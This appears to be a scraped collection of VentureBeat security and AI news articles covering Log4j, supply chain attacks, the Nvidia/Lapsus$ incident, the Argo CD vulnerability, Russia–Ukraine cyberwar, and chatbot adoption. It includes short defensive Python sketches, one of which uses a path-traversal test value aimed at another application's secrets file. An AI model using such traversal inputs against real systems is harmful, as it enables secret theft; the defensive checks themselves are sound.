Long tail Other cyber experts have previously made similar comments to VentureBeat, saying that the worst of the attacks utilizing the Log4j flaws may actually be months — or even years — into the future. “In many cases, attackers breach a company, gain access to networks and credentials, and leverage them to carry out huge attacks months and years later,” said Rob Gurzeev, cofounder and CEO of CyCognito, in a previous email to VentureBeat. 
Once they’ve established a foothold, sophisticated attackers will often take their time in surveying users and security protocols before executing the full brunt of their attacks, said Hank Schless, senior manager for security solutions at Lookout. This helps them strategize how to most effectively avoid existing security practices and tools, Schless said, “while simultaneously identifying what parts of the infrastructure would be most effective to encrypt for a ransomware attack.” Ultimately, due to the widespread nature of the flaw, “the long tail on this vulnerability is going to be pretty long,” said Andrew Morris, the founder and CEO at GreyNoise Intelligence, in a previous interview. “It’s probably going to take a while for this to get completely cleaned up. And I think that it’s going to be a little bit before we start to understand the scale of impact from this.” "
15,154
2,021
"Report: Software supply chain attacks increased 300% in 2021 | VentureBeat"
"https://venturebeat.com/2022/01/27/report-software-supply-chain-attacks-increased-300-in-2021"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: Software supply chain attacks increased 300% in 2021 Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Software supply chain attacks grew by more than 300% in 2021, according to a study from Argon Security , recently acquired by Aqua Security. The report found that the level of security across software development environments remains low, and every company evaluated had vulnerabilities and misconfigurations that can expose them to supply chain attacks. The study identified three primary areas of risk that companies should understand and address to improve software supply chain security. Vulnerable package usage is one of the fastest-growing methods of carrying out a software supply chain attack. 
Two common attacks that leverage vulnerable packages are: 1) exploiting packages’ existing vulnerabilities to obtain access to the application and execute the attack; and 2) planting malicious code in popular open source packages and private packages to trick developers or automated pipeline tools into incorporating them as part of the application build process. Furthermore, a compromised CI/CD pipeline can expose an application’s source code. This type of breach is difficult to identify and can cause significant damage if left undetected. Attackers can take advantage of privileged access, misconfigurations, and vulnerabilities in the CI/CD pipeline infrastructure, which provides access to critical IT infrastructure, development processes, source code, and applications. It enables attackers to change code or inject malicious code during the build process and tamper with applications. Finally, code/artifact integrity was another one of the main risk areas identified. The upload of bad code to source code repositories directly impacts artifact quality and security posture. Common issues that were found in most customer environments were sensitive data in code, code quality and security issues, infrastructure-as-code issues, container image vulnerabilities, and misconfigurations. Many issues that were discovered required time-intensive cleanup projects to reduce exposure. Findings were based on a six-month analysis of customer security assessments conducted by Argon’s researchers to determine the state of enterprise security and readiness to defend against software supply chain attacks. Read the full report by Argon Security and Aqua Security. 
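On the code/artifact-integrity risk, one baseline control is recording a cryptographic digest of each artifact at build time and re-verifying it before deployment, so tampering between the pipeline and production becomes detectable. A minimal sketch of that idea — not taken from the Argon report, and the function names are illustrative:

```python
import hashlib
import hmac

def sha256_of(data: bytes) -> str:
    """Hex digest of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()

def verify_artifact(data: bytes, expected_digest: str) -> bool:
    """Check a downloaded artifact against the digest recorded at build time."""
    return hmac.compare_digest(sha256_of(data), expected_digest)

artifact = b"example build output"
recorded = sha256_of(artifact)  # digest published alongside the artifact
assert verify_artifact(artifact, recorded)
assert not verify_artifact(b"tampered build output", recorded)
```

The recorded digest only helps if it is stored somewhere the attacker cannot also modify, which is why supply-chain frameworks pair checksums with signing of the build metadata.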
"
15,155
2,022
"Unclear if Nvidia cyber 'incident' tied to Russia and Ukraine | VentureBeat"
"https://venturebeat.com/2022/02/25/unclear-if-nvidia-cyber-incident-tied-to-russia-ukraine"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Unclear if Nvidia cyber ‘incident’ tied to Russia and Ukraine Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Technology giant Nvidia has reportedly experienced a “potential” cyberattack, but it’s not yet clear if there is a connection to Russia’s military invasion of Ukraine and Vladimir Putin’s pledges to retaliate against the west over the conflict. According to The Telegraph, Nvidia, one of the largest producers of graphics chips, has been investigating “a potential cyberattack that has taken parts of its business offline for two days.” In a statement provided by Nvidia to VentureBeat on Friday, the company did not directly confirm that a cyberattack had occurred. Instead, Nvidia said that an unspecified “incident” had occurred. “We are investigating an incident,” an Nvidia spokesperson said in the statement. “Our business and commercial activities continue uninterrupted,” the spokesperson said in the statement. 
“We are still working to evaluate the nature and scope of the event and don’t have any additional information to share at this time.” Quoting an unnamed “insider” at Nvidia, The Telegraph reported that the potential cyberattack had “completely compromised” internal systems at the company — “although some email services were working on Friday,” the report said. The potential “malicious network intrusion” has caused outages for the company’s email systems and developer tools, the report says. The report specifies that “there is no evidence linking Nvidia’s outages to the conflict” in Ukraine, which has involved an unprovoked assault on the country recently by Ukraine’s neighbor Russia. A subsequent report from Bloomberg on Friday said that the incident “appears” to have involved a ransomware attack. Citing a source familiar with the situation, the report suggests the attack was “relatively minor” and not connected to Russia’s war against Ukraine. VentureBeat has reached out to Nvidia about the Bloomberg report. Increased cyberattacks Regardless of the true details of the Nvidia incident, “there will no doubt” be a pickup in cyberattacks in the coming days and weeks, said Rick Holland, CISO at Digital Shadows. However, “defenders shouldn’t conflate and immediately assume that these attacks are retaliation from western sanctions against Russia,” Holland said in an email to VentureBeat. “This response is possible, but it needs to be investigated and validated. Ransomware crews have been extorting victims for years and will continue to do so.” In his recent addresses, Putin has made clear that the entire Western world is his enemy and all options are on the table, according to Eric Byres, a cybersecurity veteran who is now CTO of aDolus Technology. 
In his speech on Thursday, for instance, Putin said that “I would now like to say something very important for those who may be tempted to interfere in these developments from the outside. No matter who tries to stand in our way or all the more so create threats for our country and our people, they must know that Russia will respond immediately, and the consequences will be such as you have never seen in your entire history.” Provocative approach Russia and government-linked groups have a significant cyber offense capability. Past attacks and current threats from Russia have represented one of the biggest drivers for the security industry for years. However, Byres told VentureBeat that he originally believed that Putin “was a rational actor that wouldn’t want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response.” But “after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I’m not so sure anymore,” Byres said. “I worry that Putin believes he is bulletproof and the U.S. is weak.” Russian cyber offensives have also been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. 
"
15,156
2,022
"Major vulnerability found in open source dev tool for Kubernetes | VentureBeat"
"https://venturebeat.com/2022/02/03/major-vulnerability-found-in-open-source-dev-tool-for-kubernetes"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Major vulnerability found in open source dev tool for Kubernetes Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Researchers today disclosed a zero-day vulnerability in Argo CD, an open source developer tool for Kubernetes, which carries a “high” severity rating. The vulnerability (CVE-2022-24348) was uncovered by the research team at cloud-native application protection firm Apiiro. The company says it reported the vulnerability to the open source Argo project before disclosing the flaw on its blog today. The bug affects all versions of Argo CD, and patches are now available. Argo CD is a continuous delivery platform for developers that use Kubernetes , the dominant container orchestration system. 
Exploits of the vulnerability in Argo CD could allow an attacker to acquire sensitive information — including passwords, secrets, and API keys — through the use of malicious Kubernetes Helm Charts, Moshe Zioni, vice president of security research at Apiiro, wrote in a blog post. Helm Charts are YAML files used to manage Kubernetes applications. Zioni said the vulnerability has been given a severity rating of “high” (7.7), though as of this writing, the National Institute of Standards and Technology (NIST) website had not yet posted the rating. In an email to VentureBeat, Zioni said the vulnerability could potentially have a “very significant impact on the industry” since Argo CD is used by thousands of organizations. The open source project has more than 8,300 stars on GitHub. The Argo CD platform enables declarative specifications for applications as well as automated deployments leveraging GitHub. Intuit donated the project to the Cloud Native Computing Foundation in 2020 after acquiring its creator, Applatix, in 2018. Potential threats The newly disclosed flaw in Argo CD “allows malicious actors to load a Kubernetes Helm Chart YAML file to the vulnerability and ‘hop’ from their application ecosystem to other applications’ data outside of the user’s scope,” Zioni said in the Apiiro blog post. Thus, attackers “can read and exfiltrate secrets, tokens, and other sensitive information residing on other applications,” he said. Exploits of the vulnerability could lead to privilege escalation, lateral movement, and disclosure of sensitive information, Zioni said in the post. Application files “usually contain an assortment of transitive values of secrets, tokens, and environmental sensitive settings,” he said. 
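The “hop” described here is, in essence, a path-scoping failure: a chart is allowed to reference files that resolve outside its own application directory. A generic illustration of the confinement check that guards against this class of bug follows — this is a sketch of the general technique, not Argo CD's actual patch, and the paths are hypothetical:

```python
from pathlib import Path

def is_within_scope(requested: str, allowed_root: str) -> bool:
    """Reject file references that resolve outside the application's own directory.

    Resolving the combined path collapses any '../' segments, so traversal
    attempts end up compared against the allowed root rather than trusted as-is.
    """
    root = Path(allowed_root).resolve()
    target = (root / requested).resolve()
    return target == root or root in target.parents

# A reference inside the chart's own directory is allowed...
assert is_within_scope("templates/app.yaml", "/repos/team-a/chart")
# ...but a traversal toward another application's files is not.
assert not is_within_scope("../../team-b/secrets.yaml", "/repos/team-a/chart")
```

Resolving before comparing is the key step: checking the raw string for `../` is easy to bypass with absolute paths or redundant segments, whereas a resolved path either sits under the root or it does not.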
“This can effectively be used by the attacker to further expand their campaign by moving laterally through different services and escalating their privileges to gain more ground on the system and target organization’s resources.” The impact of the vulnerability “can especially become critical in environments that make use of encrypted value files (e.g. using plugins with git-crypt or SOPS) containing sensitive or confidential data, and decrypt these secrets to disk before rendering the Helm chart,” a representative for the Argo CD project said in a security advisory on GitHub. “We urge users of Argo CD to update their installation to one of the fixed versions,” the advisory says. Zioni said that the Argo CD team provided a “swift” response after being informed about the vulnerability. Open source insecurity The disclosure of the vulnerability in Argo CD comes amid growing concerns about the prevalence of insecure software supply chains. High-profile incidents have included the SolarWinds and Kaseya breaches, while overall attacks involving software supply chains surged by more than 300% in 2021, Aqua Security reported. Meanwhile, open source vulnerabilities such as the widespread flaws in the Apache Log4j logging library and the Linux polkit program have underscored the issue. On Monday, the Open Source Security Foundation announced a new project designed to secure the software supply chain, backed by $5 million from Microsoft and Google. “We are seeing more advanced persistent threats that leverage zero day and known, unmitigated vulnerabilities in software supply chain platforms, such as Argo CD,” said Yaniv Bar-Dayan, cofounder and CEO at cybersecurity risk management vendor Vulcan Cyber, in an email to VentureBeat. “We need to do better as an industry before our cyber debt sinks us,” Bar-Dayan said. 
“IT security teams must collaborate and do the work to protect their development environments and software supply chains from threat actors.” "
15,157
2,022
"Russia will get hit hardest in cyberwar over Ukraine, expert says | VentureBeat"
"https://venturebeat.com/2022/02/25/russia-will-get-hit-hardest-in-cyberwar-over-ukraine-expert-says"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Russia will get hit hardest in cyberwar over Ukraine, expert says Share on Facebook Share on X Share on LinkedIn Vladimir Putin, the president of Russian Federation, on May 29, 2017. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. As substantial as the cyberattack capabilities of Russia’s affiliated hacker groups might be, the worldwide cyber effort to oppose Vladimir Putin’s unprovoked aggression against Ukraine will likely prove to be greater, a former U.S. Cyber Command official told VentureBeat. Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible. 
Research published earlier this week by a Chinese security firm indicates that a U.S.-affiliated organization, referred to as the Equation Group, is in fact “the world’s leading cyber-attack group” — whose attack capability, paired with zero-day vulnerabilities, is essentially “unstoppable.” The cyber battlefield Meanwhile, in Ukraine itself, a Bloomberg report today said that a hacker group that is now forming to bring counterattacks against Russia has amassed 500 members. And beyond Ukraine, “there are probably 100X that number of hacktivists around the world working against Russia because they are the aggressor,” said Christian Sorensen, former operational planning team lead for the U.S. Cyber Command, in an email to VentureBeat. Thus, while Russian ransomware gang Conti, the Belarus-based group known as UNC1151 and several other hacker groups may have pledged to assist Russia with its aggression against Ukraine, the cyber forces on Ukraine’s side will likely turn out to have the upper hand, Sorensen said. (And there’s reason to suspect that even some of Conti’s own affiliates aren’t actually willing to support the Russian government in this situation.) Looking ahead, “I think things will ramp up against western targets,” Sorensen said. “But Russia and Belarus will be targeted by these groups even more.” ‘Unprecedented’ situation It’s hard to predict exactly how things might develop, given that this is uncharted territory, however. “It will be unprecedented,” said Marcus Fowler, senior vice president for strategic engagements and threats at Darktrace. 
“We have not seen a conflict on this scale with such sophisticated offensive cyber capabilities on both sides.” This week, prior to Russia’s invasion of Ukraine, Chinese cybersecurity firm Pangu Lab posted research on the hacker group known as Equation Group — a name given to the group by Russian cybersecurity firm Kaspersky Lab in 2015. The research concerns a backdoor, known as Bvp47, and Pangu contends that its findings suggest that a previous claim about the group — that it is affiliated with the NSA — is correct. (The NSA has never commented on the claim.) Though the backdoor is nearly a decade old, initially discovered in 2013, Pangu Lab said it is “top-tier” — and evidence that the Equation Group is the “leading” cyberattack group. “Its network attack capability equipped by 0day vulnerabilities was unstoppable, and its data acquisition under covert control was with little effort,” Pangu Lab wrote in the research. “The Equation Group is in a dominant position in national-level cyberspace confrontation.” All of which is consistent with Kaspersky’s assessment of the Equation Group in 2015, when the company’s research team wrote that the Equation Group “surpasses anything known in terms of complexity and sophistication of techniques” — and a Kaspersky researcher told Ars Technica that the group is “second to none” in terms of skills and abilities. Sorensen, who is now founder and CEO of cybersecurity firm SightGain, said the Pangu research on Equation Group is a “very interesting report, with extraordinary timing” in terms of its publication in the midst of the events this week. And notably, in the report, “the research pointed out a common thread from 10 years ago that also existed in Equation Group report,” Sorensen said. “If that technical detail is still being used, it could slow down or impact operations of people using those tools. 
Further, it suggests that commonality between toolsets will be a tipoff for initial attribution — and then sometimes watched, and not reported, for 10 or more years.” All in all, with the events of recent days, “we are seeing very clear signs of escalated cyber tensions,” said Stan Golubchik, founder and CEO of cybersecurity firm ContraForce. “We are seeing cyber fully emerge as the fifth domain of war.” Making an impact Ultimately, while it’s not clear how much can be accomplished by anti-Russian cyber forces, there is now the potential for people all around the world to actively participate in trying to thwart a military offensive, Sorensen said. “This is the new nature of cyberwar,” he said. “Whether sanctioned or not, official or not, if people have or can get the right information, know-how, and desire — they can make an impact,” Sorensen said. “We’ll have to wait and see what they are able to do.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. © 2023 VentureBeat. All rights reserved. "
15158
2022
"Going on offense: Ukraine forms an 'IT army,' Nvidia hacks back | VentureBeat"
"https://venturebeat.com/2022/02/26/going-on-offense-ukraine-forms-an-it-army-nvidia-hacks-back"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Going on offense: Ukraine forms an ‘IT army,’ Nvidia hacks back Share on Facebook Share on X Share on LinkedIn Mykhailo Fedorov, Ukraine's vice prime minister, announced on Twitter, "We are creating an IT army." Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. It’s not directly related to the emerging cyber resistance against Russia in Ukraine — but the reports that Nvidia has turned the tables on its attacker in a ransomware incident this week does seem to resonate. Both the Nvidia case, and Ukraine’s effort to launch a cyber offensive against Russia, share a common theme of standing one’s ground and pushing back against aggressors — whether those be power-hungry nation states or cybercriminals. 
In Ukraine today, Mykhailo Fedorov, the country’s vice prime minister, announced on Twitter, “We are creating an IT army.” “We need digital talents,” wrote Fedorov, who also holds the title of minister of digital transformation — sharing a link to a Telegram channel where he said operational tasks will be distributed. “We continue to fight on the cyber front.” On the Telegram channel, the IT army reportedly posted its list of Russian targets — which were also translated into English “for all IT specialists from other countries.” Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible — including some that are believed to be aligned with the U.S. and western countries. On Friday, Christian Sorensen, a former U.S. Cyber Command official, told VentureBeat that “hacktivists around the world [will be] working against Russia, because they are the aggressor.” “I think things will ramp up against western targets, but Russia and Belarus will be targeted by these groups even more,” said Sorensen, formerly the operational planning team lead for the U.S. Cyber Command. Hacking back Meanwhile, a ransomware gang that claimed to have attacked Nvidia also reportedly posted a message that the chipmaker had hacked back. The group, Lapsus$, said on its Telegram channel that 1TB of data was removed by Nvidia, according to screenshots shared by Brett Callow, a threat analyst at Emsisoft. The ransomware group, believed to operate in South America, also said that Nvidia had encrypted the group’s data (though the group says it had a backup), according to the screenshots. Nvidia did not immediately respond to a request for comment on Saturday. 
On Friday, a spokesperson said that Nvidia was “investigating an incident” and was “still working to evaluate the nature and scope of the event.” “Our business and commercial activities continue uninterrupted,” the Nvidia spokesperson said in the statement. The statement came in response to a Friday report in The Telegraph that Nvidia, one of the largest producers of graphics chips, has been investigating “a potential cyber attack that has taken parts of its business offline for two days.” Quoting an unnamed “insider” at Nvidia, The Telegraph reported that the potential cyberattack had “completely compromised” internal systems at the company — “although some email services were working on Friday,” the report said. Preventing leaks Hacking back is “unusual, but certainly not unheard of,” Callow said in a message to VentureBeat. Often the goal is to prevent leaks of stolen data, he said. “I wouldn’t assume any connection to the conflict” in Ukraine, Callow added. Still, you can’t help but notice a common theme in terms of pushing back against cyberattacks. Russian cyber offensives have already been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. But on Friday, a Bloomberg report said that a hacker group that was now forming to bring counterattacks against Russia had amassed 500 members. And today, we have the announcement of Ukraine’s IT army — potentially including assistance from hackers around the globe. “Whether sanctioned or not, official or not, if people have or can get the right information, know-how, and desire — they can make an impact,” Sorensen said on Friday, prior to the announcement of Ukraine’s IT army. 
“We’ll have to wait and see what they are able to do.” "
15159
2021
"Despite challenges, Salesforce says chatbot adoption is accelerating | VentureBeat"
"https://venturebeat.com/2021/05/20/despite-challenges-salesforce-says-chatbot-adoption-is-accelerating"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Despite challenges, Salesforce says chatbot adoption is accelerating Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Chatbot usage has exploded during the pandemic as organizations look to bridge emerging gaps in customer service and onboarding. In 2020, the chatbot market was valued at $17.17 billion, and it is projected to reach $102.29 billion by 2026, according to Mordor Intelligence. There was also a 67% increase in chatbot usage between 2018 and 2020. This uptick correlates with chatbots’ expanding capabilities, as they enable brands to tailor offers and recommendations without humans in the loop. Chatbots leverage customer, product, and interaction data to improve experiences in real time, leading to reduced wait times, service costs, and customer churn. To discuss trends in chatbots and conversational AI more broadly, VentureBeat talked with Greg Bennett, conversational design principal at Salesforce. 
Bennett believes the technology presents an opportunity for businesses to express their brands through words and languages, creating a greater degree of intimacy with customers. Accelerated adoption According to recent estimates, Gartner predicts that by 2022, 70% of customer interactions will involve emerging technologies such as chatbots — an increase of 15% from 2018. That’s not surprising, considering a significant portion of consumers say they prefer chatbots to other virtual agents. “At Salesforce, we’re seeing more than a 700% increase in sessions with our Einstein bot products. I think a lot of that is due to the fact that we’ve experienced isolation as a result of a pandemic, but it also points to the need to scale up business,” Bennett said. “It may not necessarily be that businesses got the idea because of the pandemic, but rather the pandemic accelerated their timeline.” One example is Lee’s Famous Recipe Chicken Restaurant in Englewood, Ohio, which partnered with startup Hi Auto to build a conversational AI experience for its drive-thru customers. As a result of the pandemic, drive-thru orders in the U.S. saw an uptick of 22% in 2020. Consequently, drive-thru wait times increased by an average of 30 seconds, putting additional strain on employees. Hi Auto worked with Lee’s on a solution to the challenge. At the restaurant, the company’s chatbot greets guests, answers questions, suggests menu items, and enters orders into the point-of-sale system. If a customer asks an unrelated question — or requests something that’s not on the menu — the chatbot automatically hands them off to a human. It also integrates with Lee’s employee headsets, allowing employees to provide real-time updates to inventory, as needed. 
Lee’s plans to implement the chatbot at more of its drive-thrus, and Hi Auto says pilots with other restaurants are underway. “The automated AI drive-thru has impacted my business in a simple way. We don’t have customers waiting anymore — we greet them as soon as they get to the board, and the order is taken correctly,” Lee’s owner Chuck Doran said. “We see improvements in our average check, service time, and improvements in consistency and customer service. And because the cashier is now less stressed, [they] can focus on customer service as well.” Internal use cases Chatbots can have value beyond customer service. For example, they can assist in the employee onboarding process, fielding screening questions, recording answers, and guiding new employees through company policies and protocols. Chatbots can also address common problems, which gives IT service desk agents the opportunity to fix more complicated issues. Salesforce took a step toward addressing these use cases last year, according to Bennett, with the introduction of the Einstein bot intro template. Available in beta, the intro template lets developers create chatbots for onboarding, with popular Salesforce actions like creating a case or a lead, looking up an order, and adding a comment to an existing case. “Companies can take this baseline conversation design and customize it to fit their needs. That’s really what we’re seeing — we’re seeing a shortened time between developing and deploying chatbots,” Bennett said. The data bears this out. According to a McKinsey survey, at least a third of activities could be automated in about 60% of occupations. And in its recent Trends in Workflow Automation report, Salesforce found that 95% of IT leaders are prioritizing workflow automation technologies like chatbots, with 70% seeing the equivalent of more than four hours of savings per employee each week. 
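The hand-off behavior described for the drive-thru bot, answering on-menu requests and escalating everything else to a person, can be sketched as a simple routing rule. The menu items, function name, and substring matching below are illustrative assumptions, not Hi Auto's actual implementation.

```python
# A minimal sketch of a bot-to-human hand-off: the bot handles recognized
# menu requests and escalates anything off-menu or unrelated to an employee.
# MENU and the matching logic are assumptions for illustration only.
MENU = {"chicken sandwich", "fries", "sweet tea"}

def route_utterance(utterance: str):
    """Return ('bot', item) for a recognized menu request, else ('human', None)."""
    normalized = utterance.lower()
    for item in MENU:
        if item in normalized:
            return ("bot", item)
    # Unrelated question or off-menu request: hand off to a person
    return ("human", None)

print(route_utterance("I'll take a chicken sandwich"))  # ('bot', 'chicken sandwich')
print(route_utterance("Do you deliver to Dayton?"))     # ('human', None)
```

A production system would use intent classification with a confidence threshold rather than substring matching, but the escalation shape is the same.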
Challenges in design Asked about trends in the chatbot industry, Bennett pointed to growing awareness of inclusive approaches to design. He’s worked with teams at Salesforce to ensure chatbots don’t discriminate against certain vernaculars, like African-American English or Chicano English. “We ask ourselves, how can we make sure that, for example, a Black woman from the South in the U.S. doesn’t have to change their language in order to get the chatbot to react in the way that they don’t expect? We as research scientists, designers, product managers, and engineers have a responsibility to not only think about the bottom line, but also think about a total addressable market and consider the users that are being left behind.” Natural language models are the building blocks of apps, including chatbots. But growing evidence shows that these models risk reinforcing undesirable stereotypes, mostly because a portion of the training data is commonly sourced from communities with prejudices around gender, race, and religion. Detoxification has been proposed as a fix for this problem, but the coauthors of newer research suggest even this technique can amplify rather than mitigate biases. The increasing attention on language biases comes as some within the AI community call for greater consideration of the effects of social hierarchies like racism. In a paper published last June, Microsoft researchers advocated for a closer examination and exploration of the relationships between language, power, and prejudice in their work. The paper also concluded that the research field generally lacks clear descriptions of bias and fails to explain how, why, and to whom specific bias is harmful. “As a linguist, I look at conversation as really the fabric or the currency with which we negotiate relationships in society. Technology has now reached a point where this sort of traditionally human behavior — conversation — is something machines can partake in,” Bennett said. 
“The challenge now is to design a chatbot in such a way that it adheres to human expectations about what was once an exclusively human behavior.” Potential solutions Bennett suggests one solution to models’ shortcomings might be developing tools for customers to evaluate quality. He points to Robustness Gym, a framework developed by Salesforce’s natural language processing group, which aims to unify the patchwork of existing robustness libraries to accelerate the development of novel natural language model testing strategies. CheckList — from Amazon, Google, and Microsoft — takes a task-agnostic approach to model benchmarking, allowing people to create tests that fill cells in a spreadsheet-like matrix with capabilities and test types, along with visualizations and other resources. In a recent paper submitted to the Association for Computational Linguistics (ACL) 2021 conference (“Reliability Testing for Natural Language Processing Systems”), Bennett and Kathy Baxter, Salesforce’s principal architect of ethical AI, argue for reliability testing and contextualization to improve accountability. They explain that reliability testing, with an emphasis on interdisciplinary collaboration, will enable rigorous and targeted testing, aiding in the enactment and enforcement of industry standards. Bennett also advocates including key stakeholders throughout the chatbot design process so biases can be accounted for and mitigated — at least to the extent possible. A recent attempt at this is the Masakhane project, a grassroots organization of 400 researchers from 30 African countries (and three countries outside Africa) whose mission is to strengthen natural language research in African languages. As of February 2020, the group has published on GitHub more than 49 translation results for over 38 African languages, many of which had never been translated at scale. 
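A behavioral test of the kind CheckList popularizes can be sketched in a few lines. The toy classifier, template, and name list below are assumptions for illustration; in practice the function under test would be a real model, and the test asserts that predictions stay invariant when only a name changes.

```python
# Sketch of a CheckList-style invariance test: swapping a name (a proxy
# for a protected attribute) should not change the model's prediction.
# predict_sentiment is a toy stand-in for a real model under test.
def predict_sentiment(text: str) -> str:
    negative = {"bad", "terrible", "awful"}
    words = {w.strip(".,!?") for w in text.lower().split()}
    return "negative" if words & negative else "positive"

def invariance_failures(template: str, names: list[str]) -> list[str]:
    """Return names whose prediction deviates from the majority prediction."""
    preds = {n: predict_sentiment(template.format(name=n)) for n in names}
    majority = max(set(preds.values()), key=list(preds.values()).count)
    return [n for n, p in preds.items() if p != majority]

names = ["Emily", "Keisha", "Jamal", "Connor"]
print(invariance_failures("{name} said the service was terrible.", names))  # []
```

An empty result means the toy model treats all four names the same on this template; a real audit would run many templates and flag any names that flip the prediction.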
“Any institution has the opportunity to use a chatbot to essentially extend itself in a relationship with a customer — with prospective students, with job applicants, the list goes on. These are opportunities to create relationships and have a meaningful exchange,” Bennett said. “There’s a linguistic reason why someone uses a period versus an exclamation mark or emojis versus not. These things convey additional meaning about the state of the relationship at hand, which is the kind of thing that will continue to be really important on the product and engineering side. With chatbots, we need to think through the conversational aspects of the conversation besides everything about the text, whether the bot or the user takes the first turn.” "
15160
2022
"5 steps to minimize AI bias in marketing | VentureBeat"
"https://venturebeat.com/2022/02/20/5-steps-to-minimize-ai-bias-in-marketing"
